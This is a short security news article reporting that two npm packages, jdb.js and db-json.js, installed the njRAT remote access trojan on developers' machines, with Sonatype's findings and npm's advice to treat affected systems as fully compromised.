njRAT trojan installed malicious npm packages on infected machines

njRAT installed npm packages
Written by Emma Davis

Another malware was found in the JavaScript package manager (Node Package Manager) – njRAT trojan installed malicious npm packages on infected machines.

The developers that installed the jdb.js and db-json.js packages were infected with the njRAT remote access trojan. Both packages were removed from npm earlier this week.

Packages were created by the same author and described as tools that help working with JSON files. Both packages were uploaded to npm last week, and users downloaded them more than 100 times before Sonatype discovered malware in them.

njRAT installed npm packages

According to Sonatype analysts, these packages contained a malicious script that was run after the developer imported and installed any of the two malicious libraries. The script performed basic reconnaissance on the infected host and then tried to download and run the patch.exe file (file on VirusTotal), which later installed the njRAT Trojan on the affected machine. This malware is also known as Bladabindi and has been used by cybercriminals since at least 2015.

To load njRAT without problems, the patch.exe loader changed the behaviour of the local Windows firewall by adding a rule for its command and control server to the whitelist before downloading the malware.

Interestingly, only the jdb.js package demonstared this behaviour, while the second package, db-json.js, simply loaded the first one (obviously to mask the malicious behaviour).tell Sonatype experts.

Since njRAT is a very serious threat, the npm security team recommends affected developers to consider that their systems were completely compromised.

Removing a malicious package alone will not be enough in this case, since “there is no guarantee that removing a package will remove all the malware that appears as a result of its installation.experts emphasize.

It should be noted that since August this year, cybercriminals’ interest in npm has definitely increased. In recent months, experts have more than once discovered various malicious packages designed to steal data from infected systems.

Apparently, hackers are interested in breaking into developers in order to be able to steal credentials from confidential projects, source code, intellectual property, or prepare for attacks on larger supply chains.

Let me remind you about the fact that npm package was stealing information from browsers and Discord, as well as that Sonatype Information security specialists discovered malicious npm package with a backdoor.

User Review
0 (0 votes)
Comments Rating 0 (0 reviews)

About the author

Emma Davis

I'm writer and content manager (a short time ago completed a bachelor degree in Marketing from the Gustavus Adolphus College). For now, I have a deep drive to study cyber security.

Leave a Reply